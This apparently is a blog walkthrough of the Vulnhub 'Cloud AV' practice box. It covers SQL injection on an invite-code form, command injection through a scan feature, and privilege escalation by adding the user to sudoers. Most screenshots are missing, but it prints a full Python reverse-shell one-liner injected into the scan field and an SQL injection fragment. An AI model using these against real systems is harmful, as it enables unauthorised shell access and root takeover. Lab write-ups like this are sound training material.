Vulnhub BoredHackerBlog: Cloud AV Walkthrough

    The description states:  "Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.  Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs."

    This box is labeled easy and I think that's fair enough although a couple of sections may hang some people up. 

    First, we kick off with Nmap:



    Not a whole lot of options so we'll explore port 8080:


    Meanwhile, Nikto is running:


    We find an additional page:


    Circling back to the first page, let's see if we can get some sort of injection:


    When we select the Log in button, we get:


    I'm not sure I've encountered SQLite but the syntax is nearly the same.  Instead of:  '1 or '1'='1

    We go with:


    If you're not familiar with SQL injection, basically, we're saying the invite code is (NOTHING) or 1=1.  And since 1 does equal 1, a true statement, we bypass this process.  And we do...


    Assuming we're supposed to choose one of the above files, I choose hello and select Scan! :


    Wondering if we can abuse this...


    Turns out, we can:


    Now I'm wondering if we can get out:


    With our handler setup:


    Excellent!  We can reach out.  Let's go for a reverse shell:


    What you can't see:

    ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.99",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'  

    With our handler setup:


    We catch our shell!  Looking around:


    We have a compiled binary and what I assume is the source code. 

    Let's take a look:


    Looks like we can abuse it:


    We get execution of a command as root.  Excellent!  Let's shove our user into sudoers with all permissions and no password:


    We sudo su and we're root! 

    Nice box! 


    © 2020 sevenlayers.com